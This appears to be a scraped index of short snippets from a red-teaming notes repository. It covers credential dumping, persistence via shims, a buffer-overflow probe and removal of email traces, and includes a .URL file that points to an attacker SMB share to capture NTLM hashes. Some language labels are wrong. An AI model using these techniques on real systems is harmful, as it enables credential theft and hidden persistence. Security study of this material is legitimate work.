https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md Install the python3-venv package, which is required to create and manage Python virtual environments. This ensures a clean environment for impacket. ```bash apt install python3-venv ``` -------------------------------- ### Install MinGW using Chocolatey Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/code-injection-process-injection/executing-shellcode-with-inline-assembly-in-c-c++.md Installs the MinGW compiler suite using the Chocolatey package manager. This is a prerequisite for compiling C/C++ code with inline assembly. ```csharp choco install mingw ``` -------------------------------- ### Registry Key for Root Certificates Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/persistence/t1130-install-root-certificate.md The location of installed root certificates in the Windows registry. Monitoring changes to this key can help detect the installation of new root certificates. ```powershell Computer\HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C6B22A75B0633E76C9F21A81F2EE6E991F5C94AE ``` -------------------------------- ### Send Initial String to Vulnerable Program Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/code-execution/binary-exploitation/stack-based-buffer-overflow.md This command sends a simple string 'hello' to the vulnerable server program to observe its initial behavior and potential crash. ```bash "hello" | nc 192.168.99.3 10000 ``` -------------------------------- ### Login as Machine Account with NetOnly Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts.md Demonstrates logging in as a machine account using the '/netonly' flag. This is useful for testing access to network resources without establishing an interactive session, especially after a pass-the-hash. ```cmd runas /user:testmachine$ /netonly powershell ``` -------------------------------- ### Start TSSP Server for NTLM Credential Dumping Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/credential-access-and-credential-dumping/dumping-delegated-default-kerberos-and-ntlm-credentials-without-touching-lsass.md Starts a TSSP named pipe server on the target system. This can be run by a low-privileged user for NTLM credential dumping. ```powershell // running as ws02\spotless tsssp::server ``` -------------------------------- ### Example of Removed Email Headers Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/red-team-infrastructure/smtp.md This is an example of an email's headers after the Postfix configuration has been applied, showing that sensitive information like 'Received' and 'X-Originating-IP' headers have been successfully removed. ```text Delivered-To: mantvydo@gmail.com Received: by 2002:a81:1157:0:0:0:0:0 with SMTP id 84-v6csp5668508ywr; Wed, 3 Oct 2018 03:47:35 -0700 (PDT) X-Google-Smtp-Source: ACcGV614wuffoVOsvFkTPPxCiRj0hgFwTIH7y3B4ziIaXfogLFjsoiFyYOdNVChhr+oRcL1axO+a X-Received: by 2002:a17:902:a9cc:: with SMTP id b12-v6mr988630plr.198.1538563655360; Wed, 03 Oct 2018 03:47:35 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1538563655; cv=none; d=google.com; s=arc-20160816; b=qhbzI+R3vHbkqwp2ALOEQ0ItUXU/fA1kEmYln1dBe0CmLELuIfourst4gZVYiU0tAf sRx20Z5Vcqvv9w6s6f2gVp6crlOuoX2cSKJCn/HyRYKiDB5aVKpEYTDjQtGEBRLoL9xm /T8+3PgV6CHy/KowoPeLugKg3t5mIh9pq+Ig8gG+VVKZcFyvUBJa9YEgBgVKcMwew8H6 x8WzIB2zyavpZLnbIi6SrtheYZAeSTMTwXRutqxZl0n4O/iZS4Y+ZVdRlYeXFXFNdtMK JFaS1XVLR4hYXOzlQT1IC2yeQlqf+Q3FJukmkDlDTgw91ImfZa0HtQYQoo3LwKotp92Q 1HiQ== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=from:date:message-id; bh=hZH42YPrA1C1YyKkQ/LM0S6pyh9p5LGmoqE/s4CGGts=; b=Squ71HtAuuwYHfX+4z63WcgBMoiKbcX5KAQLKwfvlnXuF5QEJNHjfX0GwekViXJIZ5 D2v03648ni6W3/b6uXVoecrtX0MZ9Z/Ck+LxcJRi16toE4QfjR6fhX5l9OSKFjgqkst3 Exk9yB1iiX8IAoIvnSaT0pQ5UzOov5Yneti3HO8QbzeCnT1/HieLwIhB/d+znryw1mTQ jj/VBlNEGFEJhpXjS7cbQFHQEz3yGl1YTSNB3Kxp9T5a7+ncsW3pOAlfKqNYpVywSlBe s6OUSTZ/bEwVYP3dv9aHmbpOIV6rC8uPgUlm+SKYtlj9xiR9uXTtj21IbA0F1esFx+Up jAQw== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com Return-Path: Received: from ubuntu-s-1vcpu-1gb-sfo2-01 ([206.189.221.162]) by mx.google.com with ESMTP id y11-v6si1190446plg.237.2018.10.03.03.47.35 for ; Wed, 03 Oct 2018 03:47:35 -0700 (PDT) Received-SPF: pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) client-ip=206.189.221.162; Authentication-Results: mx.google.com; spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com Message-Id: <20181003104734.1871F42006E@kali> Date: Wed, 3 Oct 2018 11:47:28 +0100 (BST) From: root removing traces like a sir ``` -------------------------------- ### Invoke PowerShell Driver Installation Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/miscellaneous-reversing-forensics/windows-kernel-internals/loading-a-windows-kernel-driver-osr-driver-loader-debugging-with-source-code.md Installs a kernel driver by invoking the custom `Install-Driver` PowerShell function. Ensure the .sys file is in the current directory and the function is loaded in your PowerShell profile. ```powershell Install-Driver wdm-helloworld.sys ``` -------------------------------- ### Create and Write to a Named Pipe Server Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation.md This C++ code demonstrates how to create a named pipe server, accept a single client connection, and write a message to the pipe. Ensure the pipe name is accessible and unique. ```cpp #include "pch.h" #include #include int main() { LPCWSTR pipeName = L"\\.\\pipe\\mantvydas-first-pipe"; LPVOID pipeBuffer = NULL; HANDLE serverPipe; DWORD readBytes = 0; DWORD readBuffer = 0; int err = 0; BOOL isPipeConnected; BOOL isPipeOpen; wchar_t message[] = L"HELL"; DWORD messageLenght = lstrlen(message) * 2; DWORD bytesWritten = 0; std::wcout << "Creating named pipe " << pipeName << std::endl; serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL); isPipeConnected = ConnectNamedPipe(serverPipe, NULL); if (isPipeConnected) { std::wcout << "Incoming connection to " << pipeName << std::endl; } std::wcout << "Sending message: " << message << std::endl; WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL); return 0; } ``` -------------------------------- ### Install Shim Fixes Database Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/persistence/t1138-application-shimming.md Install the created shim fixes database onto the victim machine using the sdbinst.exe utility. This prepares the system to apply the shim when the target application is launched. ```powershell sdbinst.exe C:\experiments\mantvydas.sdb ``` -------------------------------- ### Create .URL file for Forced Authentication Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/initial-access/t1187-forced-authentication.md This C# snippet defines the structure of a .URL file. Configure the IconFile to point to your attacker-controlled SMB share. ```csharp [InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\10.0.0.5\%USERNAME%.icon IconIndex=1 ``` -------------------------------- ### Query Winlogon Userinit Value Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/persistence/windows-logon-helper.md Use this command to check the current value of the 'userinit' registry key. This helps understand the existing configuration before making changes. ```powershell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit ``` -------------------------------- ### Query LSASS Protected Process Start Event Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security/enumeration-and-discovery/windows-event-ids-for-situational-awareness.md Use this PowerShell command to query the system event log for Event ID 12, which indicates when LSASS started as a protected process. This is useful for detecting potential security bypasses. ```powershell Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' } ``` -------------------------------- ### Run BloodHound Application Source: https://github.com/mantvydasb/redteaming-tactics-and-techniques/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux.md Launches the BloodHound application. Requires prior configuration of the neo4j database with user credentials. ```bash bloodhound ```